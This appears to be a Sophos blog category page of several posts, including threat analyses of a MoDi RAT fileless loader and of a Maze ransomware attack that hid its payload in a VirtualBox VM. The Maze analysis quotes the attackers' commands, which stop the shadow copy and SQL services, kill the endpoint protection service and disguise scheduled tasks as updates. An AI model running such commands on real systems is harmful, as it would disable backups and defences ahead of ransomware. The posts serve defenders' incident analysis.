Category: Sophos

Few organizations have the resources in house to effectively manage their security programs while proactively defending against new and emerging threats.

As a result, organizations are looking to managed detection and response (MDR) services to run their security operations programs.

However, the security services marketplace is relatively new it’s and filled with false claims and confusing jargon.

Our MDR Buyers Guide is available as a PDF or in audio format and provides clarity by walking you through the key considerations when choosing an MDR service. It also enables you to see how MDR providers stack up against one another.

Evaluating MDR providers: 12 questions to ask

When evaluating an MDR provider, we recommending asking the following:

1. How many customers does the MDR service have?

The current customer count will give you an idea of how many other organizations trust the service provider, and how well-versed they are at responding to suspicious activity.

2. What is the scope of the service? Is threat response included?

Most vendors focus on threat identification and notification, leaving response and remediation to the customer. Effective MDR services go far beyond this. Ask for clarity on what is offered.

3. Is the service 24/7/365? If an issue arises at 2AM on a Sunday, who will respond?

Ensure the MDR service truly monitors your environment and is able to respond any time, day or night.

4. Which technologies does the service utilize? Are they included in the price?

Ask if the technology used by the operators is included in the price of the service or if you must purchase your own tools separately.

5. Is the service being provided proactive or reactive?

MDR is a proactive discipline. Ensure you’re not being offered digital forensics and incident response services, typically used to deal with an existing crisis.

6. How will you interact with the MDR team?

Is there direct call-in support? Can you communicate via email? Speak directly with SOC analysts, or through an intermediary?

7. What is the security operations threat detection and response (TDR) methodology?

MDR providers should have a well-defined TDR methodology. If not, they’ll likely struggle to scale as their business grows and will be more likely to miss important indicators of suspicious activity.

8. How fast is the service?

In security, seconds matter. MDR providers should be able to estimate the average times to detect, respond, and resolve.

9. What types of remediation actions can the MDR operators take? Can they take active response for you?

Find out what happens when the service detects suspicious activity. Many will simply monitor and notify you. They should be able to act on your behalf and provide response.

10. Is threat hunting lead-driven (responding to alerts), lead-less (looking for new indicators of attack without alerts), or both?

Some vendors refer to automated alert generation as threat hunting (it’s not). Understand if the MDR operators will proactively hunt to detect adversaries in your environment regardless of whether or not they’ve detected a strong indicator of activity or compromise.

11. What data sources are used to provide visibility? Is the service just “managed EDR”?

While endpoint data is critical for a security operation program, some MDR providers don’t have any additional visibility beyond the endpoint. These are not true MDR providers but rather “managed EDR” services.

12. Does the MDR provider have access to threat intelligence and threat researchers?

MDR providers should have a level of expertise that goes beyond what most organizations can build independently: skilled security analysts, access to proprietary threat intelligence, and collaboration with threat researchers when something novel is detected.

These questions and a comprehensive vendor comparison are covered in our MDR Buyers Guide – available as a PDF or in audio format.

Give your organization the best protection with Sophos Managed Threat Response (MTR)

Sophos MTR provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service. Beyond simply notifying you of attacks or suspicious behaviors, the Sophos MTR team takes targeted actions on your behalf to neutralize even the most sophisticated and complex threats.

The Sophos MTR team of threat hunters and response experts:

• Proactively hunt for and validate potential threats and incidents
• Use all available information to determine the scope and severity of threats
• Apply the appropriate business context for valid threats
• Initiate actions to remotely disrupt, contain, and neutralize threats
• Provide actionable advice for addressing the root cause of recurring incidents

Visit Sophos.com/MTR today to learn more.

DOWNLOAD: ‘MDR Buyers Guide’ full report ►

Sophos XG Firewall has joined the robust and growing Nutanix ecosystem that is enabling global enterprises to converge and virtualize their IT infrastructure.

XG Firewall is now Nutanix AHV and Nutanix Flow ready to provide protection for networked applications and traffic in Nutanix virtualized environments. XG Firewall delivers the same kind of easy deployment, management and performance that Nutanix AHV is known for.

Nutanix is the industry leader in hyperconverged infrastructure (HCI) that makes the underlying datacenter and cloud infrastructure invisible, abstracting and elevating it to enable businesses to focus on their applications and services. The Nutanix AHV hypervisor converges private, public, and distributed clouds, bringing simplicity and agility to infrastructure management.

XG Firewall v18 with the new Xstream Architecture running on Nutanix AHV provides deeper visibility into applications, network activity, and threats – able to stop even previously unseen attacks.

Nutanix Flow is a software defined network policy engine built into AHV that provides easy and granular policy-driven application micro-segmentation.

XG Firewall has been validated to provide two modes of operation within Nutanix AHV infrastructure:

1. XG firewall can provide standard NGFW protection on Nutanix AHV similar to any other physical, virtual, cloud, or hybrid network.
2. In addition, non-IP bridge mode in XG can be used within the network as part of Nutanix Flow’s micro-segmentation to transparently redirect VM traffic through a virtual XG Firewall running in bridge mode on every AHV host to protect east-west traffic.

XG Firewall can protect traffic entering and leaving the Nutanix AHV infrastructure while also securing traffic moving within the Nutanix Flow software defined network, taking advantage of the granular redirection capabilities of Nutanix Flow micro-segmentation that ensures security protection policies are optimized for individual applications.

XG Firewall’s full suite of protection capabilities will help secure Nutanix applications and network traffic flows, including TLS inspection, intrusion prevention, application control, web protection and filtering, and zero-day threat protection with sandboxing and threat intelligence.

Visit Sophos.com/Firewall to learn more about XG Firewall products.

SophosLabs researchers Fraser Howard and Andrew O’Donnell stumbled upon an unusual reflective loader attack method last month while hunting through threat telemetry. The attack chain started with a malicious email message that contained some hostile VB scripting code, and concluded by delivering a commodity remote access Trojan named MoDi RAT.

These kinds of detections often lead to interesting, divergent attacks, which is what the detection teams are looking for. Diving down the rabbit hole, Howard and O’Donnell discovered a few intriguing twists to the convoluted attack, which included a Scheduled Task that started a Visual Basic Script file that, in turn, launches PowerShell and then literally pasted the text of the commands into the PowerShell window, rather than passing the command string as a parameter.

But let’s not get ahead of ourselves. Here is Howard’s root cause analysis (RCA) of the attack chain.

AMSI vs. MoDi RAT

The attack analysis pivoted on some of the data collected from Sophos endpoint products using Microsoft’s Antimalware Scan Interface (AMSI). The root cause of the attack triggered our telemetry: a malicious script, delivered (most likely) via spam. In the example below, the user’s browser (Edge, highlighted in red below) started the attack chain, which you can see in this snippet of the threat case.

The attack begins when a recipient of the malspam opens the message attachment. The Visual Basic Script in the message attachment connects to a remote site, which is the entry point into a series of HTTP 302 redirects that eventually lead to a .Zip archive, hosted in OneDrive cloud storage, that contains an encoded VBS (VBE) file. 

With the VBE file in hand, we set about reproducing the entire attack to get a complete picture, right through to the payload.

The initial VBScript writes out a second VBS file to the filesystem, and inserts three new entries into the Windows Registry that contain binary data, written out as 8-digit binary numbers. It then launches a system utility to create a new Scheduled Task that, at a predetermined time in the future, launches the VBS script.

When the Scheduled Task runs, it uses wscript.exe to launch the VBS. The VBS code launches PowerShell and then runs this code, which takes data from the VBS and inserts it into the system’s clipboard, where it can then programmatically “paste” the commands into the PowerShell window using the VBS SendKeys command.

This neat little trick to deliver the powershell commands seems designed to evade detection by keeping the commands they execute under the radar, rather than attracting attention by spawning an instance of PowerShell with some interesting command-line parameters that might trigger all sorts of security product alerts. From this point on, the attack is fileless.

In the next step, PowerShell extracts a .NET decoder executable from one of the Registry blobs (labeled Entreur in the Registry) that the VBE had created earlier, and reflectively loads it by injecting it into a system process.

The decoder executable, in turn, extracts the .NET injector and payload blobs (labeled in the Registry as inj and Myfile, respectively) from the Registry. Then the injector loads the payload (injecting into the host application, msbuild.exe).

Notably, the initial Zip payload name (“Timbres-electroniques”) and several other strings, including the Entreur Registry key were comprised of words from the French language. Some of the targets of these attacks were French firms.

The diagram below summarizes all this and illustrates the key components of the attack chain.

The three .NET executable layers (decoder, injector, and payload) do not touch the disk, but we proactively blocked the attack based on our recognition of the technique the attackers employ to deliver the payload filelessly.

Despite already proactively blocking this attack, as a result of our further investigation we were able to enhance existing detections to provide additional resilience against similar attacks we might see in the future.

Why you should upgrade from older Windows

Microsoft’s AMSI framework that helps us intercept and neutralize these kinds of attacks is only available on certain recent flavors of Windows (Windows 10, Windows Server 2016 and Windows Server 2019). If there’s one single reason why users of older versions of Windows should upgrade, it’s this: AMSI protection is crucial to helping us defend against many of today’s attacks, particularly those that use fileless techniques.

This attack typifies how most of the fileless attacks that we see work. AMSI provides the capability for Sophos to proactively protect customers against a range of similar attacks, and the telemetry we’re able to get lets us dive into these rabbit holes so we can identify and enhance our protections more effectively.

Sophos endpoint products will detect the components of this attack as AMSI/Reflect-D, Troj/VBSInj-D, and AMSI/ModiRat-A.

Indicators of compromise

IoCs relating to this investigation have been posted to the SophosLabs Github.

Customer profile: An organization with many hundreds of networked devices based in Asia Pacific.

The Sophos Managed Threat Response (MTR) team was called in to help an organization targeted with Maze ransomware. The attackers issued a ransom demand for US$15 million – if they had succeeded this would have been one of the most expense ransomware payments to date.

Background: Ransomware partners in crime

 Maze is one of the most notorious ransomware families, active since 2019 when it evolved from ChaCha ransomware. It was among the first to combine data encryption with information theft.

The operators behind Maze have recently started colluding with other ransomware groups, including LockBit, SunCrypt and Ragnar Locker, providing them with access to their platform for posting stolen victim data.

This appears to have led to a reciprocal sharing of tactics, techniques and procedures (TTPs): in the attack covered here the Maze group borrowed a Ragnar Locker technique that involves using virtual machines.

For detailed technical analysis of this collaboration between attackers read Maze attackers adopt Ragnar Locker virtual machine technique.

Days 1-3: The attack begins

Prior to the attack becoming active, the operators compromised a computer on the target’s network. This computer was then used as a ‘beach head’ in the network. On multiple occasions during the attack, the attackers connected from here to other computers over Remote Desktop Protocol (RDP).

On day three, the main part of the attack began. The attackers exploited a domain admin account with a weak password to take control of an unprotected Domain Controller (DC). They then spent several days moving across the network.

Using the legitimate network scanning tool Advanced IP Scanner to map the network, the attackers created lists of IP addresses to which they would later deploy ransomware. These included a list of the IP addresses of machines belonging to the target’s IT administrators.

The attackers’ attention then turned to the exfiltration of data.

They identified a file server and accessed it remotely over RDP using the compromised domain admin account. Using the legitimate archiving tools WinRar and 7zip, they started compressing folders located on it.

These archives were then copied back to the primary DC using the legitimate Total Commander FTP client that the attackers had installed on the file server.

The attackers tried to install the cloud storage application Mega on the DC. This was blocked as the target had added Mega to their blocked list using the application control capability in Sophos Intercept X endpoint protection. The attackers then switched to using the web-based version instead, uploading the compressed files.

Days 4-5: The calm before the storm

For two days, the attackers went quiet. It’s likely they were waiting for a day when the target’s IT security team wouldn’t be working, like the weekend.

Day 6: The first ransomware attack is launched

The first Maze ransomware attack was launched on a Sunday, using the already compromised domain admin account and the lists of IP addresses that had been identified.

This first attack actually comprised three attacks as the operators deployed three copies of the Maze ransomware via batch scripts to the targeted computers:

• C:ProgramDataenc6.exe
• C:ProgramDataenc.exe
• C:ProgramDatanetwork.dll

Three scheduled tasks were created to execute the ransomware:

Name	Command
Windows Update Security Patches	C:ProgramDataenc6.exe
Windows Update Security Patches 5	C:ProgramDataenc.exe
Windows Update Security	regsvr32.exe /i c:programdatanetwork.dll

 

Over 700 computers were targeted in the attack, which was detected and blocked by Sophos Intercept X.

Either the attackers didn’t realize the attack had been blocked or they were hoping that the theft of the data would be enough for the target to pay up – but whatever the reason, upon launching the first attack attempt they issued a ransom demand for US$ 15 million.

Day 7: The MTR team gets to work

Realizing that they were under attack, the target’s security team engaged the advanced incident response skills of the Sophos MTR team. The team quickly identified the compromised admin account, identified and removed several malicious files, and blocked attacker commands and C2 (command and control) communications.

Day 8: Investigation and neutralization continue

Over the following hours the MTR team found further tools and techniques used by the attackers, as well as evidence relating to the exfiltration of data. More files and accounts were blocked.

Day 9: The second attack

The attackers launched a second attack via a different compromised account. This attack was similar to the first one: commands were executed on a DC, looping through the lists of IP addresses contained in txt files.

However, this time they coped a file called license.exe to C:ProgramData:

This was followed by a scheduled task to execute it. In this attack attempt the task was called “Google Chrome Security Update”:

The attack was quickly identified and stopped. Intercept X detected the ransomware, and the MTR team disabled and deleted both the compromised account and the license.exe file. No files were encrypted.

Day 9: Third time lucky?

Just a few hours after the second attempt, the attackers tried again.

By now they seemed to be growing desperate. This attack targeted a single machine, the main file server that the exfiltrated data had been taken from, and used a completely different technique to the previous attacks.

In the third attempt, the attackers distributed the ransomware payload inside a virtual machine (VM).

Fortunately the MTR investigators recognized this new approach immediately as they had also responded to the Ragnar Locker ransomware attack where the technique was first seen.

The Maze operators had enhanced the technique, but it was undoubtedly the same. The attack was detected and stopped and no files were encrypted.

 Defeating adversaries in human-led attacks

This casebook highlights how agile and adaptable human-operated attacks can be, with the attackers able to quickly substitute and reconfigure tools and return to the ring for another round.  It also demonstrates how, to minimize likelihood of detection, attackers take advantage of multiple legitimate IT tools in their attacks.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.

What can defenders do?

The most important things an IT security team can do is to reduce the attack surface, implement strong security software, including specialist anti-ransomware security, educate employees, and consider setting up or engaging a human threat hunting service to spot the clues that software can’t.

Any organization can be a ransomware target, and any spam or phishing email, exposed RDP port, vulnerable exploitable gateway device or stolen remote access credentials will be enough for such adversaries to gain a foothold.

MITRE ATT&CK Mapping

 The MITRE ATT&CK framework is a globally accessible knowledge base of known adversary tactics, techniques and procedures (TTPs).  It can help security teams as well as threat hunters and analysts to better understand, anticipate and mitigate attacker behavior.

Initial Access

• T1078.002 – Valid Accounts: Domain Accounts
• T1133 – External Remote Services

Execution

• T1059.001 – Command & Scripting Interrupter: PowerShell
• T1059.003 – Command and Scripting Interpreter: Windows Command Shell
• T1047 – Windows Management Instrumentation
• T1053.005 – Scheduled Task/Job: Scheduled Task

Defense Evasion

• T1564.006 – Hide Artifacts: Run Virtual Instance

Credential Access

Discovery

• T1016 – System Network Configuration Discovery

Lateral Movement

• T1021.001 – Remote Services: Remote Desktop Protocol
• T1021.002 – Remote Services: SMB/Windows Admin Shares

Command & Control

• T1071.001 – Application Layer Protocol: Web Protocols

Exfiltration

• T1567.002 – Exfiltration Over Web Service: Exfiltration to Cloud Storage

Impact

• T1486 – Data Encrypted for Impact

Sophos Managed Threat Response and threat hunting

For more information on the Sophos MTR service visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

Scroll to top

We are proud to announce that Sophos has been recognized as a Leader in the IDC MarketScape: Worldwide Mobile Threat Management Software 2020 Vendor Assessment.

The report provides an overview of mobile threat management (MTM) security solutions, also referred to as mobile threat defense (MTD) solutions – an increasingly important security market segment in today’s world, where an increasingly mobile workforce is doing more work on mobile devices than ever.

We believe this placement for Sophos Intercept X for Mobile is a testament to the strength of the Intercept X deep learning engine used across Sophos’ endpoint security range of products. Together with the flexibility of strong management and security capabilities in Sophos Central, the cloud-based management platform for all Sophos products lets organizations manage their mobile, endpoint, server, and network security in the same console.

Furthermore, we believe that this placement is due to Intercept X for Mobile’s seamless integration with the powerful endpoint management capabilities of Sophos Mobile, giving organizations the best of both worlds for mobile threat management (MTM) and unified endpoint management (UEM).

According to the report, “Sophos’ combination of MTM and UEM products is rare among MTM vendors and unique among vendors in this study.”

Intercept X for Mobile is available for Android, iOS, and Chrome OS and offers users world-class device, network, and app security, protecting against the latest mobile threats such as ransomware, network attacks, and exploits. According to the report, “This combination [of MTM and UEM] gives Sophos a strong advantage in situations where enterprises want a single vendor for both mobile device management and security enforcement.”

Sophos Intercept X for Mobile also integrates with a broad range of third-party platforms, including Microsoft Intune and other top UEM vendors – providing organizations with a flexible solution to protect against mobile threats within their unique existing security infrastructures.

To learn more about Intercept X for Mobile, head over to Sophos.com or download and try it for yourself at Google Play or the App Store.

While conducting an investigation into an attack in July in which the attackers repeatedly attempted to infect computers with Maze ransomware, analysts with Sophos’ Managed Threat Response (MTR) discovered that the attackers had adopted a technique pioneered by the threat actors behind Ragnar Locker earlier this year, in which the ransomware payload was distributed inside of a virtual machine (VM).

In the Maze incident, the threat actors distributed the file-encrypting payload of the ransomware on the VM’s virtual hard drive (a VirtualBox virtual disk image (.vdi) file), which was delivered inside of a Windows .msi installer file more than 700MB in size. The attackers also bundled a stripped down, 11 year old copy of the VirtualBox hypervisor inside the .msi file, which runs the VM as a “headless” device, with no user-facing interface.

The Maze-delivered virtual machine was running Windows 7, as opposed to the Windows XP VM distributed in the Ragnar Locker incident. A threat hunt through telemetry data initially indicated the attackers may have been present on the attack target’s network for at least three days prior to the attack beginning in earnest, but subsequent analysis revealed that the attackers had penetrated the network at least six days prior to delivering the ransomware payload.

The investigation also turned up several installer scripts that revealed the attackers’ tactics, and found that the attackers had spent days preparing to launch the ransomware by building lists of IP addresses inside the target’s network, using one of the target’s domain controller servers, and exfiltrating data to cloud storage provider Mega.nz.

The threat actors initially demanded a $15 million ransom from the target of the attack. The target did not pay the ransom.

How the attack transpired

Subsequent analysis by the MTR team revealed that the attackers orchestrated the attack using batch files, and made multiple attempts to maliciously encrypt machines on the network; The first iteration of ransomware payloads were all copied to the root of the %programdata% folder, using the filenames enc.exe, enc6.exe, and network.dll. The attackers then created scheduled tasks that would launch the ransomware with names based on variants of Windows Update Security or Windows Update Security Patches.

The initial attack did not produce the desired result; The attackers made a second attempt, with a ransomware payload named license.exe, launched from the same location. But before they launched it, they executed a script that disabled Windows Defender’s Real-Time Monitoring feature.

The attackers then, once again, executed a command that would create a scheduled task on each computer they had copied the license.exe payload to, this time named Google Chrome Security Update, and set it up to run once at midnight (in the local time zone of the infected computers).

These detections indicate that the ransomware payloads were being caught and quarantined on machines protected by Sophos endpoint products before they could cause harm. Sophos analysts started to see detections that indicated the malware was triggering the Cryptoguard behavioral protections of Intercept X. In this case, Cryptoguard was preventing the malware from encrypting files by intercepting and neutralizing the Windows APIs that the ransomware was attempting to use to encrypt the hard drive.

So the attackers decided to try a more radical approach for their third attempt.

Weaponized virtual machine

The Maze attackers delivered the attack components for the third attack in the form of an .msi installer file. Inside of the .msi was an installer for both the 32-bit and 64-bit versions of VirtualBox 3.0.4. This version dates back to 2009 and is still branded with its then-publisher’s name, Sun Microsystems.

The .msi also contains a 1.9GB (uncompressed) virtual disk named micro.vdi, which itself contains a bootable partition of Windows 7 SP1, and a file named micro.xml that contains configuration information for the virtual hard drive and session.

The root of that virtual disk contained three files associated with the Maze ransomware: preload.bat, vrun.exe, and a file just named payload (with no file extension), which is the actual Maze DLL payload.

The DLL file has a different, internal name for itself.

The preload.bat file (shown below) modifies the computer name of the virtual machine, generating a series of random numbers to use as the name, and joins the virtual machine to the network domain of the victim organization’s network using a WMI command-line function.

The virtual machine was, apparently, configured in advance by someone who knew something about the victim’s network, because its configuration file (“micro.xml”) maps two drive letters that are used as shared network drives in this particular organization, presumably so it can encrypt the files on those shares as well as on the local machine. It also creates a folder in C:SDRSMLINK and shares this folder with the rest of the network.

At some point (it’s unclear when and how, exactly, it accomplished this), the malware also writes out a file named startup_vrun.bat. We found this file in c:usersAdministratorAppDataRoamingMicrosoftWindowsStart MenuStartup, which means it’s a persistence mechanism that relies on the computer rebooting before the attackers launch the malware.

The script copies the same three files found on the root of the VM disk (the vrun.exe and payload DLL binaries, and the preload.bat batch script) to other disks, then issues a command to shut down the computer immediately. When someone powers the computer on again, the script executes vrun.exe.

The C:SDRSMLINK folder location, created when the .msi file first runs, acts as a clearinghouse for specific folders the malware wants to track. It’s full of symbolic links (symlinks, similar to Windows shortcuts) to folders on the local hard drive.

The Ragnar Locker connection

The technique used in the third attack is completely different to those used before by the threat actors behind Maze, but the investigators recognized it immediately because the team who responded to this Maze attack are the same team that responded to the Ragnar Locker ransomware attack, where the technique was first seen.

In Sophos’ earlier reporting about Ragnar Locker, we wrote that “Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine. The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.” MITRE has subsequently added this technique to its ATT&CK framework.

The Maze attackers took a slightly different approach, using a virtual Windows 7 machine instead of XP. This significantly increased the size of the virtual disk, but also adds some new functionality that wasn’t available in the Ragnar Locker version. The threat actors bundled a VirtualBox installer and the weaponized VM virtual drive inside a file named pikujuwusewa.msi. The attackers then used a batch script called starter.bat.to launch the attack from within the VM.

The virtual machine (VM) that Sophos extracted from the Maze attack shows that this (newer) VM is configured in such a way that it allows easy insertion of another ransomware on the attacker’s ‘builder’ machine. But the cost in terms of size is signficant: The Ragnar Locker virtual disk was only a quarter the size of the nearly 2GB virtual disk used in the Maze attack—all just to conceal one 494 KB ransomware executable from detection.

	Ragnar Locker	Maze
MSI installer	122 MB OracleVA.msi	733 MB pikujuwusewa.msi
Virtual Disk Image (VDI)	282 MB micro.vdi	1.90 GB micro.vdi
Ransomware binary in VDI	49 KB vrun.exe	494 KB payload

 

The attackers also executed the following commands on the host computer during the Maze attack:

cmd /c msiexec /qn /i \<machine-hosting-malware>frspikujuwusewa.msi

This ran the Microsoft Installer that installs VirtualBox and the virtual hard drive.

C:WindowsSystem32cmd.exe /C sc stop vss

They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies.

C:WindowsSystem32cmd.exe /C sc stop sql

They halt SQL services to ensure that they can encrypt any databases.

C:WindowsSystem32cmd.exe /C taskkill /F /IM SavService.exe

They attempt to stop Sophos endpoint protection services (which fails).

C:WindowsSystem32cmd.exe /C sc start VBoxDRV

Finally, they start the VirtualBox service and launch the VM.

The future of ransomware?

The Maze threat actors have proven to be adept at adopting the techniques demonstrated to be successful by other ransomware gangs, including the use of extortion as a means to extract payment from victims. As endpoint protection products improve their abilities to defend against ransomware, attackers are forced to expend greater effort to make an end-run around those protections.

Sophos endpoint products detect components of this attack as Troj/Ransom-GAV or Troj/Swrort-EG. Indicators of compromise can be found on the SophosLabs Github.

For many organizations, Macs are a regular fixture in their IT estates. Whether they comprise just a few devices or a significant proportion, Macs need the same levels of cybersecurity protection and visibility as their Windows cousins.

Which is why in addition to proven protection from the latest Mac threats, Endpoint Detection and Response (EDR) is now available for Mac users in addition to Windows and Linux.

Intercept X Advanced with EDR gives both IT admins and cybersecurity experts the power to answer critical IT operations and threat hunting questions, and then remotely take any necessary actions.

Upgrade your IT security operations

Maintaining proper IT hygiene can be a significant time investment for IT admins. Being able to identify which devices need attention and what action needs to be taken can add another layer of complexity.

With Sophos EDR, you can now do just that – quickly and easily. For example:

• Find devices with software vulnerabilities, unknown services running, or unauthorized browser extensions
• Identify devices that have unwanted software
• See if software has been deployed on devices, e.g. to make sure a rollout is complete
• Remotely access devices to dig deeper and take action, such as installing software, editing configuration files, and rebooting a device

Hunt and neutralize threats

Tracking down subtle, evasive threats requires a tool capable of detecting even the smallest indicators of compromise.

With this release, Sophos EDR is significantly enhancing its threat hunting capabilities. For example:

• Detect processes attempting to make a connection on non-standard ports
• Get granular detail on unexpected script executions
• Identify processes that have created files or modified configuration files
• Remotely access a device to deploy additional forensic tools, terminate suspect processes, and run scripts or programs

Introducing Live Discover and Live Response

The features that make solving all the important examples above possible are Live Discover and Live Response.

Live Discover allows you to examine your data for almost any question you can think of by searching across Mac devices with SQL queries. You can choose from a selection of out-of-the-box queries, which can be fully customized to pull the exact information that you need, both when performing IT security operations hygiene and threat hunting tasks. Data is stored on-disk for up to 90 days, meaning query response times are fast and efficient.

Live Response is a command line interface that can remotely access devices in order to perform further investigation or take appropriate action. For example:

• Rebooting a device pending updates
• Terminating suspicious processes
• Browsing the file system
• Editing configuration files
• Running scripts and programs

And it’s all done remotely, so it’s ideal in working situations where you may not have physical access to a device that needs attention.

Try the new features

Existing Intercept X Advanced with EDR customers will automatically see their Mac devices appearing for selection in Live Discover and Live Response by September 16.

Intercept X and Intercept X for Server customers that would like to try out EDR functionality can head to the Sophos Central console, select ‘Free Trials’ in the left-hand menu and choose the ‘Intercept X Advanced with EDR’ or ‘Intercept X Advanced for Server with EDR’ trial.

If you’re new to Sophos Central, start a no-obligation free trial of Intercept X Advanced with EDR today. You’ll get world class protection against the latest cybersecurity threats in addition to powerful EDR capabilities. Get started.

Live Discover and Live Response are available for Windows, Mac, and Linux devices.